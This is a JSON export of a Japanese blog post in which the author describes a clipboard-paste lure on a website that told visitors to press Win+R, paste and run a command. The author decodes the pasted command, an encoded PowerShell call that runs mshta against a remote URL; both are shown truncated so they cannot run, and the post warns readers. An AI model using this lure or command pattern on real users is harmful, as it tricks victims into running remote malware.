{"id":2384,"date":"2024-08-15T18:52:51","date_gmt":"2024-08-15T09:52:51","guid":{"rendered":"https:\/\/blog.minatoproject.com\/?p=2384"},"modified":"2024-08-15T18:53:54","modified_gmt":"2024-08-15T09:53:54","slug":"%e3%80%90%e5%b0%8f%e3%83%8d%e3%82%bf%e3%80%91%e6%96%b0%e6%89%8b%e3%81%ae%e3%83%9e%e3%83%ab%e3%82%a6%e3%82%a7%e3%82%a2%ef%bc%9f","status":"publish","type":"post","link":"https:\/\/blog.minatoproject.com\/?p=2384","title":{"rendered":"\u3010\u5c0f\u30cd\u30bf\u3011\u65b0\u624b\u306e\u30de\u30eb\u30a6\u30a7\u30a2\uff1f"},"content":{"rendered":"<div class=\"veu_autoEyeCatchBox\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-1024x576.png\" class=\"attachment-large size-large wp-post-image\" alt=\"\" srcset=\"https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-1024x576.png 1024w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-300x169.png 300w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-768x432.png 768w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch-320x180.png 320w, https:\/\/blog.minatoproject.com\/wp-content\/uploads\/2019\/01\/diary_eyecatch.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div>\n<p>\u4eca\u65e5\u3001\u3068\u3042\u308b\u30b5\u30a4\u30c8\u3092\u898b\u3066\u3044\u305f\u3089\u5510\u7a81\u306b\u5225\u30bf\u30d6\u304c\u958b\u3044\u3066\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u6587\u8a00\u304c\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Verification Steps<br>1. Press Windows Button \"\" + R<br>2. Press CTRL + V<br>3. Press Enter<\/pre>\n\n\n\n<p>\u8981\u3059\u308b\u306b\u300c\u30d5\u30a1\u30a4\u30eb\u540d\u3092\u6307\u5b9a\u3057\u3066\u5b9f\u884c\u300d\u3092\u958b\u3044\u3066\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u3092\u8cbc\u308a\u4ed8\u3051\u3066\u5b9f\u884c\u3057\u308d\u3001\u3068\u8a00\u3063\u3066\u3044\u3066\u3001\u3064\u307e\u308a\u3053\u306e\u30bf\u30d6\u304c\u958b\u304b\u308c\u305f\u6642\u70b9\u3067\u4f55\u3084\u3089\u3088\u304b\u3089\u306c\u6587\u5b57\u5217\u304c\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u306b\u5165\u3063\u305f\u3068\u601d\u3044\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<p>\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u306b\u306f\u4ee5\u4e0b\u306e\u6587\u5b57\u5217\u304c\u5165\u3063\u3066\u3044\u307e\u3057\u305f\u3002\uff08\u8aa4\u64cd\u4f5c\u9632\u6b62\u306e\u305f\u3081\u4e00\u90e8\u7701\u7565\u3057\u307e\u3059\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell.exe -eC bQBz...ADEA<\/pre>\n\n\n\n<p><code>-eC<\/code> \u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u3001MSDN\u3092\u898b\u308b\u3068\u6b21\u306e\u3088\u3046\u306b\u66f8\u3044\u3066\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong>-EncodedCommand &lt;Base64EncodedCommand&gt;<\/strong><\/p>\n\n\n\n<p>Base 64 \u30a8\u30f3\u30b3\u30fc\u30c9\u6587\u5b57\u5217\u7248\u306e\u30b3\u30de\u30f3\u30c9\u3092\u8a31\u53ef\u3057\u307e\u3059\u3002 \u8907\u96d1\u306a\u5f15\u7528\u7b26\u3084\u4e2d\u304b\u3063\u3053\u3092\u5fc5\u8981\u3068\u3059\u308b\u30b3\u30de\u30f3\u30c9\u3092 PowerShell \u306b\u6e21\u3059\u5834\u5408\u306b\u3053\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u30fc\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002 \u6587\u5b57\u5217\u306f UTF-16LE \u6587\u5b57\u30a8\u30f3\u30b3\u30fc\u30c9\u3092\u4f7f\u7528\u3057\u3066\u66f8\u5f0f\u8a2d\u5b9a\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n<p><a href=\"https:\/\/learn.microsoft.com\/ja-jp\/powershell\/module\/microsoft.powershell.core\/about\/about_powershell_exe?view=powershell-5.1\" target=\"_blank\" rel=\"noopener\" title=\"\">PowerShell exe \u306b\u3064\u3044\u3066 &#8211; PowerShell | Microsoft Learn<\/a><\/p>\n<\/blockquote>\n\n\n\n<p>\u306a\u306e\u3067\u6b21\u306f\u4e0a\u8a18\u306e\u5f15\u6570\u3092Base64\u30c7\u30b3\u30fc\u30c9\u3057\u307e\u3059\u3002MSDN\u306b\u8a18\u8f09\u306e\u3068\u304a\u308a UTF-16 LE \u3068\u3057\u3066\u30c7\u30b3\u30fc\u30c9\u3059\u308c\u3070\u3088\u3044\u3067\u3059\u3002<\/p>\n\n\n\n<p>\u30c7\u30b3\u30fc\u30c9\u3059\u308b\u3068\u3053\u306e\u3088\u3046\u306a\u30b3\u30de\u30f3\u30c9\u304c\u51fa\u3066\u304d\u307e\u3057\u305f\u3002\uff08\u8aa4\u64cd\u4f5c\u9632\u6b62\u306e\u305f\u3081\u4ee5\u4e0b\u7565<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mshta https:\/\/...\/...<\/pre>\n\n\n\n<p>mshta\u306f\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u4e0a\u306e\u30d7\u30ed\u30b0\u30e9\u30e0\u3092\u5b9f\u884c\u3059\u308b\u3001Windows\u306b\u4ed8\u5c5e\u3057\u3066\u3044\u308b\u30b3\u30de\u30f3\u30c9\u3089\u3057\u3044\u3067\u3059\u3002<\/p>\n\n\n\n<p>\u4e0a\u8a18\u306eURL\u306e\u4e2d\u8eab\u307e\u3067\u306f\u6016\u3059\u304e\u3066\u8997\u3044\u3066\u3044\u307e\u305b\u3093\u304c\u3001\u4e0b\u8a18\u306e\u3068\u304a\u308a\u30a6\u30a3\u30eb\u30b9\u3063\u307d\u3044\u3082\u306e\u3092\u30d0\u30e9\u6492\u304f\u5e38\u5957\u624b\u6bb5\u3068\u3057\u3066\u53e4\u304f\u304b\u3089\u3042\u3063\u305f\u3063\u307d\u3044\u306e\u3067\u3001\u7686\u3055\u307e\u3082\u4f3c\u305f\u3088\u3046\u306a\u4e8b\u4f8b\u306b\u906d\u9047\u3057\u305f\u5834\u5408\u306f\u3054\u6ce8\u610f\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.trendmicro.co.jp\/archives\/2729\" target=\"_blank\" rel=\"noopener\" title=\"\">HTA\u3092\u5229\u7528\u3057\u305f\u30ef\u30f3\u30af\u30ea\u30c3\u30af\u30a6\u30a8\u30a2\u306e\u65b0\u305f\u306a\u624b\u53e3 | (trendmicro.co.jp)<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4eca\u65e5\u3001\u3068\u3042\u308b\u30b5\u30a4\u30c8\u3092\u898b\u3066\u3044\u305f\u3089\u5510\u7a81\u306b\u5225\u30bf\u30d6\u304c\u958b\u3044\u3066\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u6587\u8a00\u304c\u8868\u793a\u3055\u308c\u307e\u3057\u305f\u3002 Verification Steps1. Press Windows Button &#8220;&#8221; + R2. Press CTRL + V3 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1596,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"vkexunit_cta_each_option":"","footnotes":""},"categories":[5],"tags":[],"class_list":["post-2384","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pc"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts\/2384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2384"}],"version-history":[{"count":4,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts\/2384\/revisions"}],"predecessor-version":[{"id":2388,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/posts\/2384\/revisions\/2388"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=\/wp\/v2\/media\/1596"}],"wp:attachment":[{"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.minatoproject.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}